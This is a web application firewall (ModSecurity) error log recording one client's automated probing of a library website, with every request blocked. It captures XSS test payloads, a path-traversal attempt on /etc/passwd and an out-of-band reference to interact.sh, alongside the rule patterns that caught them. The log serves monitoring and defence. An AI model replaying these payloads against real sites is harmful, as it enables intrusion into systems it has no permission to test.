[Tue Aug 29 11:56:01.589197 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqTv1kAAAAa"]
[Tue Aug 29 11:56:01.591702 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAArB1uUAAAAV"]
[Tue Aug 29 11:56:01.604884 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAqSw4YAAAAN"]
[Tue Aug 29 11:56:02.647031 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAApa-RkAAAAg"]
[Tue Aug 29 11:56:02.715039 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAq5@K8AAAAK"]
[Tue Aug 29 11:56:03.734009 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAApbUuAAAAAh"]
[Tue Aug 29 11:56:03.735463 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAAq5@LcAAAAK"]
[Tue Aug 29 11:56:04.620795 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAApbUuUAAAAh"]
[Tue Aug 29 11:56:04.688028 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAApbUugAAAAh"]
[Tue Aug 29 11:56:04.691073 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAArB1vkAAAAV"]
[Tue Aug 29 11:56:05.539923 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArB1v0AAAAV"]
[Tue Aug 29 11:56:05.749199 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAApa-SkAAAAg"]
[Tue Aug 29 11:56:06.767954 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAq@sfQAAAAM"]
[Tue Aug 29 11:56:07.536633 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAqTv18AAAAa"]
[Tue Aug 29 11:56:07.728079 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAArB1w0AAAAV"]
[Tue Aug 29 11:56:08.545063 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAAq3a6YAAAAI"]
[Tue Aug 29 11:56:08.616591 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAAqY6RgAAAAr"]
[Tue Aug 29 11:56:10.595488 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApbUw8AAAAh"]
[Tue Aug 29 11:56:10.611029 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAApXgskAAAAU"]
[Tue Aug 29 11:56:11.601557 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAq5@NkAAAAK"]
[Tue Aug 29 11:56:11.733515 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAqeFk0AAAAx"]
[Tue Aug 29 11:56:12.532355 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAApHRlUAAAAP"]
[Tue Aug 29 11:56:12.655378 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAolK0QAAAAe"]
[Tue Aug 29 11:56:13.696553 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAApbUyAAAAAh"]
[Tue Aug 29 11:56:14.592200 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16bsCo-f0AAArC7iAAAAAW"]
